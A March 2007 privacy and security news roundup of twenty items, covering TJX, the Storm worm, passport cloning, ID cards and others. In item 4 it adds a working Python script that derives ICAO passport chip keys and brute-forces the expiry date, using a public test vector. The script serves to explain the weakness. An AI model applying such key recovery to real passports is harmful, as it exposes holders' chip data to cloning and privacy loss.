Privacy Roundup #0008 • March 2007
March 2007 was dominated by the record-breaking TJX card heist, fresh doubts over UK identity and passport plans, and a steady drip of malware, phishing and tracking that put personal data under siege.
1. Botnets punt Russian dog-barking translation spam
Kaspersky reported that Trojans made up ninety per cent of new malicious code in 2006, much of it built to herd infected machines into spam-spewing botnets. The junk ranged from English-language pharmaceutical pitches to a Russian gadget that claimed to translate a dog's bark.
2. Vista keygen hoax exposed
A tool that claimed to brute-force Windows Vista activation keys turned out to be a hoax, with its own author admitting it never worked. The episode highlighted how piracy fears and activation checks were shaping the way Microsoft handled user machines.
3. Microsoft's OneCare flunks anti-virus test
Microsoft's Live OneCare came last in an independent test of seventeen security packages, missing almost eighteen per cent of nearly half a million malware samples. The poor showing raised doubts about how well home users relying on it were actually protected.
4. How to clone a biometric passport while it's still in the bag
Security consultant Adam Laurie showed that a new UK biometric passport could be cloned without removing it from its delivery envelope. The key protecting the chip was derived from the passport number, date of birth and expiry date, fields an attacker could guess or narrow down well enough to recover the key within hours.
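The weakness behind this item is the ICAO 9303 Basic Access Control key derivation: the chip's keys are a SHA-1 of the printed passport number, date of birth and expiry date (each with its check digit), so anyone who can guess those fields can derive the keys offline. The following is an added example written for this roundup, not code from the article or from Adam Laurie; it implements the ICAO derivation and then brute-forces the expiry date over a window, assuming the passport number and date of birth are already known. The passport data is the public ICAO Doc 9303 worked example, and matching against a known Kseed stands in for the challenge-response an attacker would really run against the chip.

```python
"""
Added example: ICAO 9303 Basic Access Control (BAC) key derivation plus a
brute-force over the expiry date. Not the article's or Adam Laurie's code;
the passport fields below are the ICAO Doc 9303 worked example (public test
vector), not a real document.
"""
import hashlib
from datetime import datetime, timedelta

WEIGHTS = (7, 3, 1)


def mrz_check_digit(field: str) -> int:
    """ICAO 9303 check digit: digits count as themselves, A-Z as 10..35,
    filler '<' as 0; weights 7,3,1 repeat; result is the weighted sum mod 10."""
    total = 0
    for i, ch in enumerate(field):
        if ch.isdigit():
            value = int(ch)
        elif ch == "<":
            value = 0
        elif "A" <= ch <= "Z":
            value = ord(ch) - ord("A") + 10
        else:
            raise ValueError(f"invalid MRZ character {ch!r}")
        total += value * WEIGHTS[i % 3]
    return total % 10


def mrz_information(doc_number: str, dob: str, expiry: str) -> str:
    """The 24-character string hashed for BAC: document number (9 chars,
    '<'-padded) + check digit, DOB (YYMMDD) + check digit, expiry (YYMMDD)
    + check digit."""
    doc = doc_number.ljust(9, "<")
    if len(doc) != 9 or len(dob) != 6 or len(expiry) != 6:
        raise ValueError("bad MRZ field lengths")
    return (f"{doc}{mrz_check_digit(doc)}"
            f"{dob}{mrz_check_digit(dob)}"
            f"{expiry}{mrz_check_digit(expiry)}")


def adjust_parity(key: bytes) -> bytes:
    """Force DES odd parity: the low bit of each byte is set so that the
    byte contains an odd number of 1 bits."""
    out = bytearray()
    for b in key:
        ones_in_upper7 = bin(b >> 1).count("1")
        out.append((b & 0xFE) | (0 if ones_in_upper7 % 2 else 1))
    return bytes(out)


def bac_keys(doc_number: str, dob: str, expiry: str):
    """Return (Kseed, KENC, KMAC) per ICAO 9303:
    Kseed = SHA-1(MRZ_information)[:16]
    KENC  = SHA-1(Kseed || 00000001)[:16], KMAC = SHA-1(Kseed || 00000002)[:16],
    both parity-adjusted for use as 3DES keys."""
    info = mrz_information(doc_number, dob, expiry).encode("ascii")
    kseed = hashlib.sha1(info).digest()[:16]
    kenc = adjust_parity(hashlib.sha1(kseed + b"\x00\x00\x00\x01").digest()[:16])
    kmac = adjust_parity(hashlib.sha1(kseed + b"\x00\x00\x00\x02").digest()[:16])
    return kseed, kenc, kmac


def recover_expiry(doc_number, dob, target_kseed, window_start, window_days):
    """Brute-force the expiry date, assuming the document number and DOB are
    already known. window_start is 'YYMMDD'. Comparing against a known Kseed
    is a stand-in for the chip's challenge-response, which is what each
    candidate would really be tested against; the search size is what matters."""
    start = datetime.strptime(window_start, "%y%m%d")
    for offset in range(window_days):
        candidate = (start + timedelta(days=offset)).strftime("%y%m%d")
        if bac_keys(doc_number, dob, candidate)[0] == target_kseed:
            return candidate
    return None


if __name__ == "__main__":
    # ICAO Doc 9303 worked example (constructed, public test vector)
    kseed, kenc, kmac = bac_keys("L898902C<", "690806", "940623")
    print("MRZ_information:", mrz_information("L898902C<", "690806", "940623"))
    print("Kseed:", kseed.hex().upper())  # 239AB9CB282DAF66231DC5A4DF6BFBAE
    print("expiry recovered:", recover_expiry("L898902C<", "690806", kseed, "940601", 60))
```

The point the brute-force makes is that the key has no entropy beyond the three printed fields: with the number and birth date known, a 60-day window on the expiry date is sixty SHA-1 calls. Even with a date of birth only known to the year and an expiry date only known to the issuing quarter, the search stays within a few tens of thousands of candidates.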
5. Stormy weather for malware defenses
The Storm worm evaded signature-based antivirus by spawning thousands of variants at once, overwhelming traditional defences. Security firms were pushed towards behaviour-blocking techniques as the older detection model began to fail.
6. LexisNexis hacker jailed and fined
A young Massachusetts man was sentenced to a year in prison for his part in a conspiracy to break into a LexisNexis law-enforcement database. The intrusion exposed personal records on more than 310,000 people, some of which were used to look up details on celebrities.
7. Microsoft admits WGA update phones home
Microsoft conceded that its Windows Genuine Advantage anti-piracy update still transmitted data to Redmond even when users clicked cancel. The company insisted the information held no personal details, but the silent reporting renewed long-standing privacy complaints.
8. Internet scams dominate UK card fraud losses
APACS figures showed total UK card fraud fell three per cent in 2006, yet card-not-present and online banking losses surged as criminals moved to remote attacks. Online banking fraud nearly doubled to £33.5m as phishing incidents soared.
9. Google to anonymize user data
Google announced that it would strip identifying details from its search logs after eighteen to twenty-four months. The move followed pressure from privacy advocates and the fallout from AOL's release of supposedly anonymous search queries.
10. Blogger.com 'riddled' with malware
Researchers found hundreds of Google Blogger pages laced with the Wonka Trojan and phishing kits aimed at harvesting personal details. The Stration mass mailer was being used to drive victims towards the compromised blogs.
11. Yahoo! can! help! jail! Chinese! dissidents!
Yahoo! Hong Kong escaped prosecution over handing user information to mainland authorities, a disclosure that helped jail a journalist. Hong Kong's privacy commissioner concluded that the case fell outside his jurisdiction, leaving the disclosure unpunished.
12. Old adware habits hard to break for AT&T and Travelocity
AT&T and Travelocity were caught running adverts on adware-infected computers despite earlier promising New York's attorney general to stop. Researcher Ben Edelman documented their ads appearing through notorious ad-injection networks.
13. IE7 phishing bug nets concern
Researchers reported a cross-site scripting flaw in Internet Explorer 7 that could be twisted into more convincing phishing lures. The bug let attackers swap a navigation error page for a misleading refresh link, though exploitation was fiddly.
14. UK gov says broken passport system justifies ID cards
The Home Office used figures on roughly ten thousand fraudulent passports to argue the case for its national identity card scheme. Critics called it surreal for the government to advertise its own failings as a reason to build a vast new database.
15. US wants all 10 fingerprints on entry
The Department of Homeland Security set out plans to take all ten fingerprints from foreign air travellers rather than just two. Trials were to begin at ten airports, with a nationwide rollout of the expanded biometric screening expected within a year.
16. Commons to eye surveillance society
A Commons select committee announced an inquiry into the spread of state surveillance across Britain. Its remit took in identity cards, government databases, biometrics and CCTV, amid growing unease about data sharing and civil liberties.
17. Brussels downbeat on US passenger snoop plan
Talks over handing European passenger name records to the United States stalled, with American negotiators suggesting a deal might not be needed. At stake were data retention periods and the reach of the US Automated Targeting System over European travellers.
18. Hospital laptop theft sparks concerns
A laptop stolen from a Nottinghamshire hospital held personal details on around eleven thousand children. The loss triggered an investigation and renewed calls from security experts for full disk encryption on portable machines.
19. TJX lost up to 45.6m card numbers
TJX disclosed that intruders had lifted up to 45.6 million credit and debit card numbers over seventeen months, the largest known card theft to that date. Personal information, often including social security numbers, for at least 451,000 people was also taken.
20. ICANN urged to cut phishing trawl with banking domain
Security experts pressed ICANN to create a restricted top-level domain for verified banks, so customers could tell genuine sites from fakes. The plea followed a jump in UK phishing incidents from 1,713 in 2005 to 14,156 in 2006.